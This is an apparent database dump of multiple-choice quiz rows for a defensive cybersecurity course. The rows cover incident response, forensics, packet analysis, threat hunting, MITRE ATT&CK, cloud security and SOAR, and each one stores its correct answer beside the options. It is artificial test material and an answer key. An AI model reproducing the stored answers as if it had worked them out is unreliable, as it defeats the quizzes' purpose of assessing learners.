(6019, 277, 'When should the Lessons Learned meeting be held?', 1, 'Within 1-2 weeks of incident closure', 0, 'Soon', '2025-12-26 23:03:48', '[\"Never\", \"Within 1-2 weeks of incident closure\", \"After 1 year\", \"During the incident\"]'),
(6020, 277, 'What is the purpose of a Post-Incident Report?', 2, 'Document what happened and recommendations', 0, 'Documentation', '2025-12-26 23:03:48', '[\"To blame someone\", \"Document what happened and recommendations\", \"To close the ticket\", \"To delete logs\"]'),
(6021, 277, 'How do you prevent similar incidents?', 3, 'Update SIEM rules, playbooks, and train staff', 0, 'Improve', '2025-12-26 23:03:48', '[\"Ignore it\", \"Update SIEM rules, playbooks, and train staff\", \"Fire everyone\", \"Do nothing\"]'),
(6022, 278, 'Which framework defines the 4-phase IR lifecycle?', 1, 'NIST SP 800-61', 0, 'Standard', '2025-12-26 23:03:48', '[\"ISO 27001\", \"NIST SP 800-61\", \"PCI DSS\", \"HIPAA\"]'),
(6023, 278, 'What is the first phase of IR?', 2, 'Preparation', 0, 'First', '2025-12-26 23:03:48', '[\"Detection\", \"Preparation\", \"Containment\", \"Recovery\"]'),
(6024, 278, 'Isolating a host from the network is part of which phase?', 3, 'Containment', 0, 'Isolate', '2025-12-26 23:03:48', '[\"Preparation\", \"Detection\", \"Containment\", \"Eradication\"]'),
(6025, 278, 'Why preserve volatile memory (RAM)?', 4, 'It contains forensic evidence lost on shutdown', 0, 'Evidence', '2025-12-26 23:03:48', '[\"It is faster\", \"It contains forensic evidence lost on shutdown\", \"It is pretty\", \"No reason\"]'),
(6026, 278, 'What document guides response to specific incident types?', 5, 'Playbook', 0, 'Runbook', '2025-12-26 23:03:48', '[\"Resume\", \"Playbook\", \"Novel\", \"Menu\"]'),
(6027, 278, 'What happens in the \"Post-Incident\" phase?', 6, 'Lessons Learned and improvement', 0, 'Review', '2025-12-26 23:03:48', '[\"Panic\", \"Lessons Learned and improvement\", \"Vacation\", \"Nothing\"]'),
(6028, 281, 'What is the \"Golden Rule\" of forensics?', 1, 'Preserve the evidence', 0, 'Do not alter', '2025-12-26 23:05:09', '[\"Delete everything\", \"Preserve the evidence\", \"Work fast\", \"Guess the answer\"]'),
(6029, 281, 'Which forensics type focuses on RAM?', 2, 'Memory Forensics', 0, 'Volatile', '2025-12-26 23:05:09', '[\"Disk\", \"Memory Forensics\", \"Network\", \"Mobile\"]'),
(6030, 281, 'Why is forensics used in lawsuits?', 3, 'eDiscovery and litigation support', 0, 'Legal', '2025-12-26 23:05:09', '[\"For fun\", \"eDiscovery and litigation support\", \"To delete evidence\", \"To hack\"]'),
(6031, 282, 'What is the first phase of the forensic process?', 1, 'Identification', 0, 'Find', '2025-12-26 23:05:09', '[\"Analysis\", \"Identification\", \"Presentation\", \"Deletion\"]'),
(6032, 282, 'Which tool is used for free disk imaging?', 2, 'FTK Imager', 0, 'Free', '2025-12-26 23:05:09', '[\"Wireshark\", \"FTK Imager\", \"Nmap\", \"Burp Suite\"]'),
(6033, 282, 'What document tracks who touched the evidence?', 3, 'Chain of Custody', 0, 'Log', '2025-12-26 23:05:09', '[\"Resume\", \"Chain of Custody\", \"Invoice\", \"Email\"]'),
(6034, 283, 'What happens if Chain of Custody is broken?', 1, 'Evidence may be inadmissible in court', 0, 'Thrown out', '2025-12-26 23:05:09', '[\"Nothing\", \"Evidence may be inadmissible in court\", \"Faster trial\", \"Automatic win\"]'),
(6035, 283, 'What does a write blocker do?', 2, 'Allows reading but prevents writing to evidence', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Speeds up the disk\", \"Allows reading but prevents writing to evidence\", \"Encrypts data\", \"Deletes files\"]'),
(6036, 283, 'What should you do before touching evidence?', 3, 'Photograph the scene', 0, 'Document', '2025-12-26 23:05:09', '[\"Delete logs\", \"Photograph the scene\", \"Guess\", \"Nothing\"]'),
(6037, 284, 'Why should you image a disk before analysis?', 1, 'To preserve the original evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"It is faster\", \"To preserve the original evidence\", \"To delete files\", \"No reason\"]'),
(6038, 284, 'Which acquisition type captures deleted data?', 2, 'Physical Image', 0, 'Complete', '2025-12-26 23:05:09', '[\"Logical\", \"Physical Image\", \"Live\", \"None\"]'),
(6039, 284, 'How do you verify a disk image is accurate?', 3, 'Compare hashes of source and image', 0, 'Hash match', '2025-12-26 23:05:09', '[\"Guess\", \"Compare hashes of source and image\", \"Look at it\", \"Count files\"]'),
(6040, 285, 'What is the MFT in NTFS?', 1, 'Master File Table - database of all files', 0, 'Index', '2025-12-26 23:05:09', '[\"Main Folder Tree\", \"Master File Table - database of all files\", \"Memory File Track\", \"My First Table\"]'),
(6041, 285, 'What can Alternate Data Streams (ADS) be used for?', 2, 'Hiding data attached to files', 0, 'Steganography', '2025-12-26 23:05:09', '[\"Speeding up reads\", \"Hiding data attached to files\", \"Compressing files\", \"Encrypting\"]'),
(6042, 285, 'What is \"Timestomping\"?', 3, 'Modifying timestamps to hide activity', 0, 'Anti-forensics', '2025-12-26 23:05:09', '[\"Creating timestamps\", \"Modifying timestamps to hide activity\", \"Deleting timestamps\", \"Reading timestamps\"]'),
(6043, 286, 'Which registry hive contains user password hashes?', 1, 'SAM', 0, 'Security', '2025-12-26 23:05:09', '[\"SYSTEM\", \"SAM\", \"SOFTWARE\", \"NTUSER\"]'),
(6044, 286, 'What does Prefetch show?', 2, 'Programs that have been executed', 0, 'Execution', '2025-12-26 23:05:09', '[\"Network connections\", \"Programs that have been executed\", \"Passwords\", \"Emails\"]'),
(6045, 286, 'Where are Windows Event Logs stored?', 3, 'C:\\Windows\\System32\\winevt', 0, 'Logs path', '2025-12-26 23:05:09', '[\"Desktop\", \"C:\\\\Windows\\\\System32\\\\winevt\", \"Recycle Bin\", \"Documents\"]'),
(6046, 287, 'What is the golden rule of forensics?', 1, 'Preserve the evidence', 0, 'Protect', '2025-12-26 23:05:09', '[\"Analyze fast\", \"Preserve the evidence\", \"Delete duplicates\", \"Guess\"]'),
(6047, 287, 'Which tool is commonly used for memory forensics?', 2, 'Volatility', 0, 'RAM', '2025-12-26 23:05:09', '[\"FTK Imager\", \"Volatility\", \"Wireshark\", \"Nmap\"]'),
(6048, 287, 'What does a write blocker prevent?', 3, 'Writing to evidence (preserve integrity)', 0, 'Read-only', '2025-12-26 23:05:09', '[\"Reading\", \"Writing to evidence (preserve integrity)\", \"Deleting\", \"Copying\"]'),
(6049, 287, 'Which Windows artifact tracks program execution?', 4, 'Prefetch', 0, 'Execution', '2025-12-26 23:05:09', '[\"SAM\", \"NTUSER\", \"Prefetch\", \"Cookies\"]'),
(6050, 287, 'What file system feature allows hidden data in NTFS?', 5, 'Alternate Data Streams (ADS)', 0, 'Hidden', '2025-12-26 23:05:09', '[\"MFT\", \"Alternate Data Streams (ADS)\", \"Journal\", \"Inodes\"]'),
(6051, 287, 'What is the purpose of hashing a disk image?', 6, 'Verify image integrity', 0, 'Verification', '2025-12-26 23:05:09', '[\"Compress it\", \"Verify image integrity\", \"Encrypt it\", \"Delete it\"]'),
(6052, 291, 'What does NTA stand for?', 1, 'Network Traffic Analysis', 0, 'NTA', '2025-12-26 23:06:44', '[\"Network Threat Assessment\", \"Network Traffic Analysis\", \"New Technology Application\", \"None\"]'),
(6053, 291, 'What limits your ability to see packet content?', 2, 'Encryption (TLS)', 0, 'Hidden', '2025-12-26 23:06:44', '[\"Speed\", \"Encryption (TLS)\", \"Color\", \"Size\"]'),
(6054, 291, 'What can you determine from packet headers?', 3, 'Source/Destination IPs and ports', 0, 'Metadata', '2025-12-26 23:06:44', '[\"File contents\", \"Source/Destination IPs and ports\", \"Passwords\", \"Nothing\"]'),
(6055, 292, 'What is a SPAN port?', 1, 'A switch port that mirrors traffic for monitoring', 0, 'Mirror', '2025-12-26 23:06:44', '[\"A special cable\", \"A switch port that mirrors traffic for monitoring\", \"A firewall rule\", \"An IP address\"]'),
(6056, 292, 'What file format stores captured packets?', 2, 'PCAP', 0, 'Packet file', '2025-12-26 23:06:44', '[\"PDF\", \"PCAP\", \"DOCX\", \"MP4\"]'),
(6057, 292, 'Which tool is a GUI for packet analysis?', 3, 'Wireshark', 0, 'GUI', '2025-12-26 23:06:44', '[\"tcpdump\", \"Wireshark\", \"grep\", \"nmap\"]'),
(6058, 293, 'What Wireshark feature reconstructs a conversation?', 1, 'Follow TCP Stream', 0, 'Conversation', '2025-12-26 23:06:44', '[\"Export\", \"Follow TCP Stream\", \"Filter\", \"Capture\"]'),
(6059, 293, 'What is a \"Display Filter\" used for?', 2, 'Showing only relevant packets', 0, 'Focus', '2025-12-26 23:06:44', '[\"Capturing packets\", \"Showing only relevant packets\", \"Deleting packets\", \"Encrypting packets\"]'),
(6060, 293, 'Which filter shows only DNS traffic?', 3, 'dns', 0, 'Protocol', '2025-12-26 23:06:44', '[\"tcp\", \"udp\", \"dns\", \"http\"]'),
(6061, 294, 'What is the first step of the TCP handshake?', 1, 'SYN', 0, 'Start', '2025-12-26 23:06:44', '[\"ACK\", \"FIN\", \"SYN\", \"RST\"]'),
(6062, 294, 'How can you extract files from HTTP traffic in Wireshark?', 2, 'Export Objects > HTTP', 0, 'File extraction', '2025-12-26 23:06:44', '[\"Copy paste\", \"Export Objects > HTTP\", \"Print\", \"Screenshot\"]'),
(6063, 294, 'What might a very long User-Agent string indicate?', 3, 'Buffer overflow attempt', 0, 'Attack', '2025-12-26 23:06:44', '[\"Normal traffic\", \"Buffer overflow attempt\", \"Slow browser\", \"Mobile device\"]'),
(6064, 295, 'What is \"Beaconing\"?', 1, 'Regular, timed connections to a C2 server', 0, 'Heartbeat', '2025-12-26 23:06:44', '[\"Random traffic\", \"Regular, timed connections to a C2 server\", \"Fast traffic\", \"Encrypted traffic\"]'),
(6065, 295, 'Why is port 4444 suspicious?', 2, 'Default Metasploit/Meterpreter port', 0, 'Known bad', '2025-12-26 23:06:44', '[\"It is slow\", \"Default Metasploit/Meterpreter port\", \"It is encrypted\", \"It is common\"]'),
(6066, 295, 'What does DGA stand for?', 3, 'Domain Generation Algorithm', 0, 'Random domains', '2025-12-26 23:06:44', '[\"Data Gathering API\", \"Domain Generation Algorithm\", \"Dynamic Gateway Access\", \"Direct Gateway Address\"]'),
(6067, 296, 'What was Zeek formerly known as?', 1, 'Bro', 0, 'Old name', '2025-12-26 23:06:44', '[\"Wireshark\", \"Bro\", \"tcpdump\", \"Snort\"]'),
(6068, 296, 'Which Zeek log tracks all network connections?', 2, 'conn.log', 0, 'Connections', '2025-12-26 23:06:44', '[\"http.log\", \"dns.log\", \"conn.log\", \"ssl.log\"]'),
(6069, 296, 'How is Zeek different from Wireshark?', 3, 'Zeek generates structured logs, better for automation', 0, 'Logs', '2025-12-26 23:06:44', '[\"Zeek has GUI\", \"Zeek generates structured logs, better for automation\", \"Zeek is slower\", \"No difference\"]'),
(6070, 297, 'What tool is used for command-line packet capture on Linux?', 1, 'tcpdump', 0, 'CLI', '2025-12-26 23:06:44', '[\"Wireshark\", \"tcpdump\", \"Nmap\", \"Netcat\"]'),
(6071, 297, 'Which Wireshark filter shows HTTP requests?', 2, 'http.request', 0, 'HTTP', '2025-12-26 23:06:44', '[\"tcp.port\", \"http.request\", \"dns\", \"frame\"]'),
(6072, 297, 'What is the TCP handshake sequence?', 3, 'SYN, SYN-ACK, ACK', 0, 'Three-way', '2025-12-26 23:06:44', '[\"ACK, SYN, FIN\", \"SYN, SYN-ACK, ACK\", \"FIN, ACK, RST\", \"None\"]'),
(6073, 297, 'What does beaconing traffic indicate?', 4, 'Possible C2 communication', 0, 'Malware', '2025-12-26 23:06:44', '[\"Normal browsing\", \"Possible C2 communication\", \"File download\", \"Email\"]'),
(6074, 297, 'Which Zeek log tracks DNS queries?', 5, 'dns.log', 0, 'DNS', '2025-12-26 23:06:44', '[\"conn.log\", \"http.log\", \"dns.log\", \"files.log\"]'),
(6075, 297, 'What file format stores captured packets?', 6, 'PCAP', 0, 'Capture', '2025-12-26 23:06:44', '[\"CSV\", \"PCAP\", \"JSON\", \"XML\"]'),
(6076, 301, 'What is the difference between SOC and Threat Hunting?', 1, 'SOC reacts to alerts; Hunting proactively searches', 0, 'Proactive', '2025-12-26 23:08:10', '[\"No difference\", \"SOC reacts to alerts; Hunting proactively searches\", \"Hunting is automated\", \"SOC is proactive\"]'),
(6077, 301, 'What is \"Dwell Time\"?', 2, 'Time an attacker stays undetected in the network', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to read alerts\", \"Time an attacker stays undetected in the network\", \"Shift duration\", \"Lunch break\"]'),
(6078, 301, 'Why are APTs hard to detect?', 3, 'They specifically evade automated detection', 0, 'Stealth', '2025-12-26 23:08:10', '[\"They are slow\", \"They specifically evade automated detection\", \"They use email\", \"They are loud\"]'),
(6079, 302, 'Detection relies on what?', 1, 'Pre-defined rules/signatures', 0, 'Rules', '2025-12-26 23:08:10', '[\"Guessing\", \"Pre-defined rules/signatures\", \"Luck\", \"Magic\"]'),
(6080, 302, 'What should happen after a successful hunt?', 2, 'Create a detection rule for future attacks', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete logs\", \"Create a detection rule for future attacks\", \"Ignore it\", \"Take vacation\"]'),
(6081, 302, 'At HMM Level 3, hunts are:', 3, 'Proactive and hypothesis-driven', 0, 'Mature', '2025-12-26 23:08:10', '[\"Nonexistent\", \"Random\", \"Proactive and hypothesis-driven\", \"Fully automated\"]'),
(6082, 303, 'What is the first step of the Hunting Loop?', 1, 'Form a Hypothesis', 0, 'Start', '2025-12-26 23:08:10', '[\"Collect data\", \"Form a Hypothesis\", \"Report\", \"Delete logs\"]'),
(6083, 303, 'If a hunt finds nothing malicious, was it wasted?', 2, 'No, you learned what normal looks like', 0, 'Value', '2025-12-26 23:08:10', '[\"Yes\", \"No, you learned what normal looks like\", \"Maybe\", \"Always\"]'),
(6084, 303, 'What should happen after a hunt?', 3, 'Document findings and create detections', 0, 'Improve', '2025-12-26 23:08:10', '[\"Delete evidence\", \"Document findings and create detections\", \"Forget it\", \"Nothing\"]'),
(6085, 304, 'What makes a good hunting hypothesis?', 1, 'Specific, actionable, based on threat intel', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague and broad\", \"Specific, actionable, based on threat intel\", \"Random\", \"Long\"]'),
(6086, 304, 'Which framework maps attacker techniques?', 2, 'MITRE ATT&CK', 0, 'Framework', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO 27001\", \"PCI DSS\"]'),
(6087, 304, 'What is a bad hypothesis?', 3, 'Something bad might happen (too vague)', 0, 'Unfocused', '2025-12-26 23:08:10', '[\"Attackers use PowerShell\", \"Something bad might happen (too vague)\", \"DNS tunneling exists\", \"Phishing leads to C2\"]'),
(6088, 305, 'Which data source shows process command lines?', 1, 'EDR', 0, 'Endpoint', '2025-12-26 23:08:10', '[\"Firewall\", \"EDR\", \"DNS\", \"Proxy\"]'),
(6089, 305, 'What is important about log retention?', 2, 'Determines how far back you can hunt', 0, 'History', '2025-12-26 23:08:10', '[\"It is not important\", \"Determines how far back you can hunt\", \"Makes logs colorful\", \"Speeds up queries\"]'),
(6090, 305, 'What tool enhances Windows logging for hunting?', 3, 'Sysmon', 0, 'Windows', '2025-12-26 23:08:10', '[\"Wireshark\", \"Sysmon\", \"Nmap\", \"Burp Suite\"]'),
(6091, 306, 'What does \"Long Tail Analysis\" focus on?', 1, 'Rare occurrences (outliers)', 0, 'Unusual', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences (outliers)\", \"Fast events\", \"Old events\"]'),
(6092, 306, 'In \"Stack Counting\", what is suspicious?', 2, 'Values that appear very rarely', 0, 'Rare', '2025-12-26 23:08:10', '[\"Values that appear often\", \"Values that appear very rarely\", \"All values\", \"No values\"]'),
(6093, 306, 'What is \"Pivoting\" in hunting?', 3, 'Moving from one indicator to related data', 0, 'Connect', '2025-12-26 23:08:10', '[\"Rotating chairs\", \"Moving from one indicator to related data\", \"Deleting logs\", \"Blocking IPs\"]'),
(6094, 307, 'Threat Hunting is:', 1, 'Proactive search for undetected threats', 0, 'Hunt', '2025-12-26 23:08:10', '[\"Waiting for alerts\", \"Proactive search for undetected threats\", \"Deleting logs\", \"Writing reports\"]'),
(6095, 307, 'What is \"Dwell Time\"?', 2, 'Time attacker remains undetected', 0, 'Hidden', '2025-12-26 23:08:10', '[\"Time to lunch\", \"Time attacker remains undetected\", \"Shift length\", \"Meeting time\"]'),
(6096, 307, 'A good hypothesis is:', 3, 'Specific and actionable', 0, 'Focused', '2025-12-26 23:08:10', '[\"Vague\", \"Specific and actionable\", \"Random\", \"Long\"]'),
(6097, 307, 'What framework maps adversary techniques?', 4, 'MITRE ATT&CK', 0, 'Matrix', '2025-12-26 23:08:10', '[\"NIST\", \"MITRE ATT&CK\", \"ISO\", \"PCI\"]'),
(6098, 307, 'Long Tail Analysis focuses on:', 5, 'Rare occurrences', 0, 'Outliers', '2025-12-26 23:08:10', '[\"Common events\", \"Rare occurrences\", \"Fast events\", \"All events\"]'),
(6099, 307, 'After finding a threat, you should:', 6, 'Create a detection rule', 0, 'Automate', '2025-12-26 23:08:10', '[\"Delete it\", \"Create a detection rule\", \"Ignore it\", \"Hide it\"]'),
(6100, 311, 'What does MITRE ATT&CK provide?', 1, 'Knowledge base of adversary tactics and techniques', 0, 'Framework', '2025-12-26 23:09:24', '[\"A firewall\", \"Knowledge base of adversary tactics and techniques\", \"An antivirus\", \"A SIEM\"]'),
(6101, 311, 'What does a \"Tactic\" represent?', 2, 'The adversary\'s goal', 0, 'Why', '2025-12-26 23:09:24', '[\"A specific tool\", \"The adversary\'s goal\", \"A CVE\", \"A patch\"]'),
(6102, 311, 'Which matrix covers Windows, Linux, macOS?', 3, 'Enterprise', 0, 'Main', '2025-12-26 23:09:24', '[\"Mobile\", \"Enterprise\", \"ICS\", \"Cloud\"]'),
(6103, 312, 'How many Enterprise tactics are there?', 1, '14', 0, 'Fourteen', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"20\"]'),
(6104, 312, 'Which tactic involves stealing passwords?', 2, 'Credential Access', 0, 'Passwords', '2025-12-26 23:09:24', '[\"Execution\", \"Credential Access\", \"Discovery\", \"Impact\"]'),
(6105, 312, 'Which tactic is about maintaining access after initial compromise?', 3, 'Persistence', 0, 'Stay', '2025-12-26 23:09:24', '[\"Initial Access\", \"Persistence\", \"Exfiltration\", \"Collection\"]'),
(6106, 313, 'What is a \"Sub-Technique\"?', 1, 'A more specific method under a main technique', 0, 'Specific', '2025-12-26 23:09:24', '[\"A different framework\", \"A more specific method under a main technique\", \"A tool\", \"A tactic\"]'),
(6107, 313, 'T1059.001 refers to:', 2, 'PowerShell execution', 0, 'Script', '2025-12-26 23:09:24', '[\"Registry\", \"PowerShell execution\", \"DNS\", \"HTTP\"]'),
(6108, 313, 'What is a \"Procedure\" in ATT&CK?', 3, 'Real-world example of technique usage', 0, 'Example', '2025-12-26 23:09:24', '[\"A tactic\", \"Real-world example of technique usage\", \"A sub-technique\", \"A detection rule\"]'),
(6109, 314, 'What tool visualizes ATT&CK coverage?', 1, 'ATT&CK Navigator', 0, 'Tool', '2025-12-26 23:09:24', '[\"Wireshark\", \"ATT&CK Navigator\", \"Nmap\", \"Burp Suite\"]'),
(6110, 314, 'In the matrix, columns represent:', 2, 'Tactics', 0, 'Goals', '2025-12-26 23:09:24', '[\"Techniques\", \"Tactics\", \"Procedures\", \"Tools\"]'),
(6111, 314, 'What format provides machine-readable ATT&CK data?', 3, 'STIX', 0, 'Standard', '2025-12-26 23:09:24', '[\"PDF\", \"STIX\", \"CSV\", \"DOCX\"]'),
(6112, 315, 'How can ATT&CK help evaluate a security product?', 1, 'Check if it detects specific techniques', 0, 'Evaluation', '2025-12-26 23:09:24', '[\"By price\", \"Check if it detects specific techniques\", \"By color\", \"By name\"]'),
(6113, 315, 'What is \"Gap Analysis\" in ATT&CK context?', 2, 'Identifying techniques you cannot detect', 0, 'Missing', '2025-12-26 23:09:24', '[\"Finding bugs\", \"Identifying techniques you cannot detect\", \"Deleting logs\", \"Writing reports\"]'),
(6114, 315, 'Threat-Informed Defense means:', 3, 'Building defenses based on likely threat actors', 0, 'Focused', '2025-12-26 23:09:24', '[\"Random defenses\", \"Building defenses based on likely threat actors\", \"No defenses\", \"Old defenses\"]'),
(6115, 316, 'ATT&CK stands for:', 1, 'Adversarial Tactics, Techniques, and Common Knowledge', 0, 'Meaning', '2025-12-26 23:09:24', '[\"Attack Technical Team\", \"Adversarial Tactics, Techniques, and Common Knowledge\", \"Automated Threat Testing\", \"None\"]'),
(6116, 316, 'How many Enterprise tactics are there?', 2, '14', 0, 'Count', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"16\"]'),
(6117, 316, 'Techniques describe:', 3, 'How adversaries achieve goals', 0, 'Method', '2025-12-26 23:09:24', '[\"Why they attack\", \"How adversaries achieve goals\", \"Who attacks\", \"When attacks happen\"]'),
(6118, 316, 'T1059 refers to:', 4, 'Command and Scripting Interpreter', 0, 'Execution', '2025-12-26 23:09:24', '[\"Persistence\", \"Command and Scripting Interpreter\", \"Discovery\", \"Exfiltration\"]'),
(6119, 316, 'Which tool visualizes ATT&CK coverage?', 5, 'Navigator', 0, 'Visualization', '2025-12-26 23:09:24', '[\"Wireshark\", \"Navigator\", \"Nmap\", \"Burp\"]'),
(6120, 316, 'Gap Analysis identifies:', 6, 'Techniques you cannot detect', 0, 'Blind spots', '2025-12-26 23:09:24', '[\"Best techniques\", \"Techniques you cannot detect\", \"Fast techniques\", \"Old techniques\"]'),
(6121, 321, 'In IaaS, who is responsible for patching the OS?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"The provider\", \"The customer\", \"Nobody\", \"Microsoft\"]'),
(6122, 321, 'Which model gives you just the application?', 2, 'SaaS', 0, 'Software', '2025-12-26 23:10:39', '[\"IaaS\", \"PaaS\", \"SaaS\", \"None\"]'),
(6123, 321, 'AWS EC2 is an example of:', 3, 'IaaS', 0, 'Infrastructure', '2025-12-26 23:10:39', '[\"PaaS\", \"SaaS\", \"IaaS\", \"FaaS\"]'),
(6124, 322, 'Who secures the physical data center?', 1, 'The cloud provider', 0, 'Provider', '2025-12-26 23:10:39', '[\"Customer\", \"The cloud provider\", \"Government\", \"Nobody\"]'),
(6125, 322, 'IAM is whose responsibility?', 2, 'The customer (always)', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer (always)\", \"Maybe both\", \"Neither\"]'),
(6126, 322, 'In SaaS, what does the customer manage?', 3, 'Data and user access', 0, 'Limited', '2025-12-26 23:10:39', '[\"Everything\", \"Data and user access\", \"Hardware\", \"Nothing\"]'),
(6127, 323, 'Which AWS service logs API calls?', 1, 'CloudTrail', 0, 'Audit', '2025-12-26 23:10:39', '[\"GuardDuty\", \"CloudTrail\", \"Config\", \"WAF\"]'),
(6128, 323, 'What should be blocked by default on S3 buckets?', 2, 'Public Access', 0, 'Privacy', '2025-12-26 23:10:39', '[\"Private Access\", \"Public Access\", \"All Access\", \"Admin Access\"]'),
(6129, 323, 'What does IAM stand for?', 3, 'Identity and Access Management', 0, 'Identity', '2025-12-26 23:10:39', '[\"Internet Access Manager\", \"Identity and Access Management\", \"Internal Admin Module\", \"Instance Access Mode\"]'),
(6130, 324, 'What is Azure Sentinel?', 1, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"Firewall\", \"Cloud-native SIEM\", \"Antivirus\", \"VPN\"]'),
(6131, 324, 'PIM provides:', 2, 'Just-in-time admin access', 0, 'Temporary', '2025-12-26 23:10:39', '[\"Permanent access\", \"Just-in-time admin access\", \"Public access\", \"No access\"]'),
(6132, 324, 'Which service manages secrets in Azure?', 3, 'Key Vault', 0, 'Secrets', '2025-12-26 23:10:39', '[\"Blob Storage\", \"Key Vault\", \"Azure AD\", \"Sentinel\"]'),
(6133, 325, 'What is the #1 cause of cloud breaches?', 1, 'Misconfigurations', 0, 'Config', '2025-12-26 23:10:39', '[\"Hackers\", \"Misconfigurations\", \"Malware\", \"Phishing\"]'),
(6134, 325, 'What does CSPM stand for?', 2, 'Cloud Security Posture Management', 0, 'Posture', '2025-12-26 23:10:39', '[\"Cloud Security Policy Manager\", \"Cloud Security Posture Management\", \"Cyber Security PM\", \"Cloud System Protection Mode\"]'),
(6135, 325, 'Open Security Groups allowing 0.0.0.0/0 SSH is:', 3, 'A critical misconfiguration', 0, 'Bad', '2025-12-26 23:10:39', '[\"Normal\", \"A critical misconfiguration\", \"Recommended\", \"Fast\"]'),
(6136, 326, 'In IaaS, who patches the operating system?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer\", \"AWS\", \"Nobody\"]'),
(6137, 326, 'The Shared Responsibility Model divides:', 2, 'Security responsibilities between customer and provider', 0, 'Division', '2025-12-26 23:10:39', '[\"Costs\", \"Security responsibilities between customer and provider\", \"Users\", \"Regions\"]'),
(6138, 326, 'Which AWS service detects threats using ML?', 3, 'GuardDuty', 0, 'ML', '2025-12-26 23:10:39', '[\"CloudTrail\", \"GuardDuty\", \"Config\", \"WAF\"]'),
(6139, 326, 'What is Azure Sentinel?', 4, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"VPN\", \"Firewall\", \"Cloud-native SIEM\", \"Storage\"]'),
(6140, 326, 'Public S3 buckets are:', 5, 'A major security risk', 0, 'Bad', '2025-12-26 23:10:39', '[\"Recommended\", \"A major security risk\", \"Fast\", \"Cheap\"]'),
(6141, 326, 'CSPM helps find:', 6, 'Cloud misconfigurations', 0, 'Errors', '2025-12-26 23:10:39', '[\"Malware\", \"Cloud misconfigurations\", \"Users\", \"Costs\"]'),
(6142, 331, 'What is \"Alert Fatigue\"?', 1, 'Being overwhelmed by too many alerts', 0, 'Tired', '2025-12-26 23:11:57', '[\"Being lazy\", \"Being overwhelmed by too many alerts\", \"Not seeing alerts\", \"Fast response\"]'),
(6143, 331, 'Automation provides what key benefit?', 2, 'Speed and consistency', 0, 'Fast', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6144, 331, 'Which task is ideal for automation?', 3, 'Repetitive enrichment lookups', 0, 'Repetitive', '2025-12-26 23:11:57', '[\"Complex investigations\", \"Repetitive enrichment lookups\", \"Board meetings\", \"Hiring\"]'),
(6145, 332, 'What does SOAR stand for?', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations and Response\", \"Security Orchestration, Automation, and Response\", \"System Organized Auto Response\", \"None\"]'),
(6146, 332, 'Which is an open-source SOAR platform?', 2, 'TheHive / Shuffle', 0, 'Free', '2025-12-26 23:11:57', '[\"Splunk SOAR\", \"TheHive / Shuffle\", \"Cortex XSOAR\", \"IBM Resilient\"]'),
(6147, 332, 'SOAR connects tools through:', 3, 'API integrations', 0, 'APIs', '2025-12-26 23:11:57', '[\"Email\", \"API integrations\", \"Phone calls\", \"Fax\"]'),
(6148, 333, 'What is the first step in a playbook?', 1, 'Trigger (what starts the workflow)', 0, 'Start', '2025-12-26 23:11:57', '[\"Action\", \"Trigger (what starts the workflow)\", \"Closure\", \"Enrichment\"]'),
(6149, 333, 'Why include \"Human in the Loop\"?', 2, 'For critical actions requiring approval', 0, 'Safety', '2025-12-26 23:11:57', '[\"Slower\", \"For critical actions requiring approval\", \"More errors\", \"Fun\"]'),
(6150, 333, 'What should playbooks always include?', 3, 'Logging and error handling', 0, 'Audit', '2025-12-26 23:11:57', '[\"Music\", \"Logging and error handling\", \"Colors\", \"Animations\"]'),
(6151, 334, 'What action is common for malware alerts?', 1, 'Isolate the host', 0, 'Containment', '2025-12-26 23:11:57', '[\"Delete the host\", \"Isolate the host\", \"Ignore\", \"Promote user\"]'),
(6152, 334, 'Threat Intel automation pushes IOCs to:', 2, 'SIEM and Firewall blocklists', 0, 'Block', '2025-12-26 23:11:57', '[\"Email\", \"SIEM and Firewall blocklists\", \"Phone\", \"Printer\"]'),
(6153, 334, 'For suspected account compromise, what should be automated?', 3, 'Force password reset and revoke sessions', 0, 'Reset', '2025-12-26 23:11:57', '[\"Promote user\", \"Force password reset and revoke sessions\", \"Delete account\", \"Ignore\"]'),
(6154, 335, 'Which Python library is used for HTTP calls?', 1, 'requests', 0, 'HTTP', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"hashlib\"]'),
(6155, 335, 'Why is Python popular for security?', 2, 'Simple syntax and great libraries', 0, 'Easy', '2025-12-26 23:11:57', '[\"It is fast\", \"Simple syntax and great libraries\", \"It is new\", \"It is hard\"]'),
(6156, 335, 'What does hashlib calculate?', 3, 'File hashes (MD5, SHA256)', 0, 'Hash', '2025-12-26 23:11:57', '[\"Passwords\", \"File hashes (MD5, SHA256)\", \"Colors\", \"Sound\"]'),
(6157, 336, 'SOAR stands for:', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations\", \"Security Orchestration, Automation, and Response\", \"System Order\", \"None\"]'),
(6158, 336, 'What is the main benefit of automation?', 2, 'Speed and consistency', 0, 'Faster', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6159, 336, 'What starts a playbook?', 3, 'A trigger (e.g., SIEM alert)', 0, 'Trigger', '2025-12-26 23:11:57', '[\"A human\", \"A trigger (e.g., SIEM alert)\", \"Random chance\", \"Nothing\"]'),
(6160, 336, 'Which Python library makes HTTP API calls?', 4, 'requests', 0, 'Library', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"os\"]'),
